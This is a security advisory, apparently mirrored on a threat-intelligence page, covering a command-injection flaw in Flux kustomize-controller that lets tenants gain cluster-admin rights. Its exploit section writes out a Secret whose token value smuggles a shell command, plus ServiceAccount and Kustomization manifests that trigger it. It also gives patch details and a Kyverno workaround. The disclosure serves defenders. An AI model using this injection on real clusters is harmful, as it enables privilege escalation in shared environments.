Privilege escalation to cluster admin on multi-tenant environments

Description

Users that can create Kubernetes Secrets, Service Accounts and Flux Kustomization objects, could execute commands inside the kustomize-controller container by embedding a shell script in a Kubernetes Secret. This can be used to run kubectl commands under the Service Account of kustomize-controller, thus allowing an authenticated Kubernetes user to gain cluster admin privileges.

Impact

Multitenant environments where non-admin users have permissions to create Flux Kustomization objects are affected by this issue.

Exploit

To exploit the command injection, first we create a secret with a shell command:

kubectl create secret generic exploit-token --from-literal=token=" || kubectl api-versions"

Then we create a Service Account that refers to the above Secret:

apiVersion: v1
kind: ServiceAccount
metadata:
  name: exploit
  namespace: default
automountServiceAccountToken: false
secrets:
- name: exploit-token

And finally a Kustomization that runs under the above Service Account:

apiVersion: kustomize.toolkit.fluxcd.io/v1beta1
kind: Kustomization
metadata:
  name: exploit
  namespace: default
spec:
  interval: 5m
  path: "./deploy/"
  sourceRef:
    kind: GitRepository
    name: app
  serviceAccountName: exploit

When kustomize-controller reconciles the above Kustomization, it will execute the shell command from the secret.

Patches

This vulnerability was fixed in kustomize-controller v0.15.0 (included in flux2 v0.18.0) released on 2021-10-08. Starting with v0.15, the kustomize-controller no longer executes shell commands on the container OS and the kubectl binary has been removed from the container image.

Workarounds

To prevent the creation of Kubernetes Service Accounts with secrets in namespaces owned by tenants, a Kubernetes validation webhook such as Gatekeeper OPA or Kyverno can be used.

apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: restrict-sa
spec:
  validationFailureAction: enforce
  background: false
  rules:
    - name: validate-sa
      match:
        resources:
          kinds:
            - ServiceAccount
          namespaces:
            - tenant1
            - tenant2
        subjects:
          - kind: User
            name: [email protected]
          - kind: User
            name: [email protected]
          - kind: ServiceAccount
            name: kustomize-controller
            namespace: flux-system
          - kind: ServiceAccount
            name: helm-controller
            namespace: flux-system
      validate:
        message: "Invalid service account"
        pattern:
          X(secrets): "*?"

References

Disclosed by ADA Logics in a security audit of the Flux project sponsored by CNCF and facilitated by OSTIF.

For more information

If you have any questions or comments about this advisory:
* Open an issue in kustomize-controller repository

Basic information

Type
reviewed
Severity
high
Advisory on GitHub
Open advisory ↗
Repository advisory
Open repository advisory ↗
Source code
Browse source ↗
Published (advisory)
2021-11-15 17:35:33 UTC
Updated
2023-02-01 05:06:27 UTC
GitHub reviewed
2021-11-12 18:57:27 UTC
NVD published
2021-11-12

EPSS Score

Score Percentile
1.31% 79.78%

CVSS Scores

Base score Version Severity Vector
8.8 3.1
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H Click to expand
Attack vector (AV:N)
Could be attacked over the internet or any normal routed network—not just someone sitting at the machine.
Attack complexity (AC:L)
Once they can reach the bug, pulling it off is straightforward—no weird race conditions or rare setup.
Privileges required (PR:L)
A normal user session is enough; they don’t have to be admin.
User interaction (UI:N)
Nobody has to click “OK” or open a trap file; it can work without a victim helping.
Scope (S:U)
Damage stays in the same “trust bubble” as the broken component—no big spill into unrelated systems.
Confidentiality (C:H)
Serious risk that confidential data gets exposed in a big way.
Integrity (I:H)
They could widely tamper with or forge data—trust in the data is badly hurt.
Availability (A:H)
Could take the service down hard or make it unusable for people who depend on it.

Identifiers

CWEs

CWE id Name
CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Credits

  • AdamKorcz (analyst)
  • DavidKorczynski (analyst)

Affected packages (1)

Vulnerable version ranges and first patched releases as published by GitHub.

Ecosystem Package Vulnerable range First patched Vulnerable functions
go github.com/fluxcd/kustomize-controller < 0.15.0 0.15.0

References

cvelogic Threat Intelligence